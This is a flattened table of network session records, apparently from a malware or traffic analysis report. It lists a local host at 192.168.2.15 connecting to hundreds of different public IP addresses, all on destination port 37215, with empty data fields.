                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19048192.168.2.1557238190.197.29.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19049192.168.2.1537538102.215.53.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19050192.168.2.153597645.160.64.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19051192.168.2.1538832157.37.178.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19052192.168.2.1557356102.121.159.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19053192.168.2.1549020138.236.25.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19054192.168.2.1536646156.59.17.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19055192.168.2.1556032222.51.200.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19056192.168.2.1535598121.65.179.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19057192.168.2.1560022121.211.233.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19058192.168.2.1556152190.120.52.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19059192.168.2.155145494.45.87.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19060192.168.2.1549834157.22.82.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19061192.168.2.1547870190.33.163.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19062192.168.2.1554872197.88.139.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19063192.168.2.1546890156.0.135.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19064192.168.2.1542694102.152.68.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19065192.168.2.156018437.205.44.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19066192.168.2.1542978190.122.211.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19067192.168.2.154293637.243.164.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19068192.168.2.154604094.143.136.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19069192.168.2.1548520222.150.111.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19070192.168.2.1538838222.123.83.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19071192.168.2.154404437.185.95.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19072192.168.2.1546266102.24.49.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19073192.168.2.154228837.19.45.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19074192.168.2.1535746156.193.118.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19075192.168.2.154509237.163.186.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19076192.168.2.154084837.250.81.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19077192.168.2.1549920156.163.207.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19078192.168.2.155628441.229.36.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19079192.168.2.1536398222.252.86.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19080192.168.2.1553590197.242.202.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19081192.168.2.156098694.21.61.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19082192.168.2.1551668138.177.218.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19083192.168.2.1552354138.23.130.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19084192.168.2.1541972181.16.252.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19085192.168.2.154624441.3.29.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19086192.168.2.1533740197.36.245.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19087192.168.2.1559628190.65.0.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19088192.168.2.1536948197.7.219.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19089192.168.2.1544962138.89.168.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19090192.168.2.1543192186.179.43.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19091192.168.2.1547668190.52.234.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19092192.168.2.1542032222.210.141.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19093192.168.2.1559510157.70.199.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19094192.168.2.1555828181.165.42.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19095192.168.2.1560580156.238.68.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19096192.168.2.1555074157.252.100.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19097192.168.2.1550718157.11.188.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19098192.168.2.153710437.231.196.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19099192.168.2.1544706197.219.205.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19100192.168.2.153320094.34.247.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19101192.168.2.1548222135.108.34.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19102192.168.2.1556996157.247.222.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19103192.168.2.1556602102.245.119.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19104192.168.2.1544724197.177.50.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19105192.168.2.153664045.201.76.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19106192.168.2.1548254102.178.176.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19107192.168.2.156058894.10.224.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19108192.168.2.1543426138.13.209.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19109192.168.2.1536074138.234.22.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19110192.168.2.1559170197.249.114.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19111192.168.2.154029294.140.231.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19112192.168.2.155851831.197.209.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19113192.168.2.1547342122.138.132.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19114192.168.2.1546356186.162.78.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19115192.168.2.1557202186.202.28.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19116192.168.2.1559906222.118.5.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19117192.168.2.155451894.114.36.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19118192.168.2.1554900121.51.57.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19119192.168.2.1544986102.2.111.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19120192.168.2.1558458121.168.128.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19121192.168.2.1533516156.199.95.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19122192.168.2.1558608122.97.87.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19123192.168.2.1551444190.73.231.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19124192.168.2.1552478186.195.224.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19125192.168.2.154235294.142.168.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19126192.168.2.1552902222.168.77.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19127192.168.2.155104431.152.123.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19128192.168.2.153774831.106.68.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19129192.168.2.155258231.254.23.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19130192.168.2.1537442102.151.36.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19131192.168.2.1550966122.160.118.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19132192.168.2.156010094.27.135.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19133192.168.2.1548752121.133.177.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19134192.168.2.1547982186.209.58.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19135192.168.2.154737041.71.90.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19136192.168.2.1554472102.119.236.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19137192.168.2.1535064181.152.47.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19138192.168.2.1553978222.245.24.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19139192.168.2.154983837.34.14.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19140192.168.2.1538568157.201.0.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19141192.168.2.153493894.176.63.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19142192.168.2.1539422219.91.74.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19143192.168.2.1550760157.233.204.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19144192.168.2.1537368138.196.178.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19145192.168.2.1534796157.208.142.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19146192.168.2.1556458122.222.39.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19147192.168.2.1556990222.244.144.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19148192.168.2.1550346186.11.227.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19149192.168.2.1551172181.46.161.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19150192.168.2.1552292181.92.96.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19151192.168.2.1537180102.169.120.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19152192.168.2.155597694.39.88.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19153192.168.2.154623441.171.171.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19154192.168.2.155246837.137.159.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19155192.168.2.1555496156.151.166.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19156192.168.2.153501294.179.187.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19157192.168.2.1541816197.26.22.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19158192.168.2.155444294.105.226.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19159192.168.2.1556226102.165.24.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19160192.168.2.1544590163.198.108.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19161192.168.2.1552872122.214.55.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19162192.168.2.155244694.1.26.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19163192.168.2.1534960138.16.123.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19164192.168.2.1541176197.183.51.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19165192.168.2.1535240181.102.20.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19166192.168.2.1560190121.146.247.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19167192.168.2.1553448186.122.63.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19168192.168.2.1533070186.93.13.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19169192.168.2.1535728186.115.145.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19170192.168.2.155090637.151.231.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19171192.168.2.1547354197.127.158.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19172192.168.2.1552528138.183.162.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19173192.168.2.153546641.152.175.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19174192.168.2.1556960121.31.239.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19175192.168.2.1543542102.59.81.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19176192.168.2.154556837.194.138.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19177192.168.2.1550928122.216.179.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19178192.168.2.1548468122.50.36.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19179192.168.2.153652031.197.63.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19180192.168.2.1535788204.169.130.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19181192.168.2.153651441.88.22.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19182192.168.2.156001441.55.88.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19183192.168.2.1538304197.78.204.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19184192.168.2.1545076190.209.164.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19185192.168.2.1556508157.191.77.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19186192.168.2.1539138138.122.62.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19187192.168.2.1555000222.211.63.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19188192.168.2.1558168181.33.225.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19189192.168.2.1556360156.37.91.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19190192.168.2.155111641.30.81.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19191192.168.2.1559158122.52.120.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19192192.168.2.1541312122.219.4.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19193192.168.2.1540292138.79.63.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19194192.168.2.1549298190.71.111.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19195192.168.2.1550754197.92.8.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19196192.168.2.1545500186.7.182.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19197192.168.2.1535360186.163.148.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19198192.168.2.1541090157.37.229.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19199192.168.2.153887694.172.131.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19200192.168.2.153551445.5.217.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19201192.168.2.1534606190.33.147.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19202192.168.2.1539358116.238.166.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19203192.168.2.154766831.50.9.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19204192.168.2.154958431.153.174.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19205192.168.2.156026094.179.161.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19206192.168.2.154661631.179.239.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19207192.168.2.154870445.208.56.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19208192.168.2.154778837.221.114.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19209192.168.2.1559414217.130.95.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19210192.168.2.155931245.177.83.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19211192.168.2.1560726204.68.90.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19212192.168.2.1542830121.190.132.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19213192.168.2.1548866122.10.138.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19214192.168.2.155334245.177.179.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19215192.168.2.155114645.202.101.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19216192.168.2.154526045.165.5.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19217192.168.2.155658431.236.7.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19218192.168.2.1545194122.44.50.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19219192.168.2.1532840157.38.245.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19220192.168.2.1556066156.108.194.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19221192.168.2.155455441.171.45.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19222192.168.2.1534098102.5.1.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19223192.168.2.1535092122.143.105.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19224192.168.2.1556506156.215.67.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19225192.168.2.1543384157.110.225.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19226192.168.2.1537448181.116.148.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19227192.168.2.1536016190.154.34.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19228192.168.2.155831245.209.13.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19229192.168.2.1536328197.58.123.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19230192.168.2.1551328121.121.102.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19231192.168.2.155505031.172.86.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19232192.168.2.1533808102.88.46.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19233192.168.2.155126637.157.1.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19234192.168.2.1559294138.137.99.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19235192.168.2.1544632121.249.193.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19236192.168.2.1533838181.253.84.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19237192.168.2.1556368197.185.203.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19238192.168.2.1533562102.196.19.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19239192.168.2.1538494197.23.149.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19240192.168.2.153933445.37.122.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19241192.168.2.154844641.107.91.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19242192.168.2.1552712102.105.66.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19243192.168.2.1547996190.186.206.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19244192.168.2.1548982222.219.185.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19245192.168.2.1549282112.134.196.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19246192.168.2.155409831.59.169.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19247192.168.2.1545666222.247.123.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19248192.168.2.154070231.177.39.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19249192.168.2.155406431.36.70.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19250192.168.2.1553788122.192.173.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19251192.168.2.153403441.45.247.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19252192.168.2.1560884190.137.130.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19253192.168.2.1546824222.175.184.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19254192.168.2.1555280186.81.67.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19255192.168.2.155616837.155.199.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19256192.168.2.1546438222.130.36.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19257192.168.2.155840431.121.96.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19258192.168.2.1555544157.99.49.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19259192.168.2.1539658190.141.7.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19260192.168.2.153396294.85.128.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19261192.168.2.1545476181.172.106.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19262192.168.2.155271645.218.19.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19263192.168.2.155326037.12.51.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19264192.168.2.154121452.92.157.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19265192.168.2.1551688211.21.123.7437215
                                              TimestampBytes transferredDirectionData


